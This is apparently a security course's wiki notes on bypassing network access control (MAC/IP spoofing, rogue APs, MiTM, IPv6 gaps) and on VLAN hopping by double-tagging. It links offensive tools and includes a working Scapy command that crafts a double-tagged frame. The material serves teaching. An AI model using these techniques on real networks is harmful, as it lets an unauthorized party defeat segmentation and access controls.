Network Vulnerabilities: NAC Bypass and VLAN Hopping - Paiet/SEC-335 GitHub Wiki

NAC bypass
- NAC grants access based on rules
  - Rules can be
    - AV defs
    - Applied patches
    - Software versions
    - All the above
- NAC can be bypassed by...
  - Pretending to be a whitelisted device
    - Some devices can't participate in NAC
      - Network printers
      - VoIP phones
        
        Just hijack the ethernet port
        
        Spoof the IP and/or MAC of whitelisted device
  - MiTM attack
    - https://github.com/Orange-Cyberdefense/fenrir-ocd
  - Compromise an authorized device
    - SE/Malware
  - Use IPv6
    - Some admins overlook IPv6 setup for their NAC
  - Use Rogue AP
    - NAC Authorized device connects to Rogue AP
    - Attacker compromises authorized device
    - Attacker uses compromised device as relay into NAC network
VLAN hopping
- Used to defeat VLAN segregation
- Frogger the VLAN Hopper
  - https://github.com/nccgroup/vlan-hopping---frogger
- VLAN Double-Tagging
  - Adding an additional VLAN tag to Ethernet frame
  - Allows you to perform VLAN Hopping attack
  - Attacker must be on native VLAN
- VLAN Hopping
  - Because of double-tagged frame
    - SwitchA receives double-tagged frame and strips off first tag
      - Native VLAN is not retagged
    - SwitchA forwards frame to SwitchB over trunk link
    - SwitchB sees tag for desired VLAN and forwards frame to victim
- Craft attack with Scapy
  - sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:50:56:39:25:60')/Dot1Q(vlan=1)/Dot1Q(vlan=20)/ IP(dst='255.255.255.255', src='10.0.0.166')/ICMP(), iface='eth0')
  - Breakdown of commands
    - Source MAC address: 00:50:56:39:25:60
    - Destination MAC address: broadcast
    - Inner VLAN tag 20
    - Outer VLAN tag 1
    - Destination IP address: broadcast
    - Source IP address: 10.0.0.166
    - Outgoing interface: eth0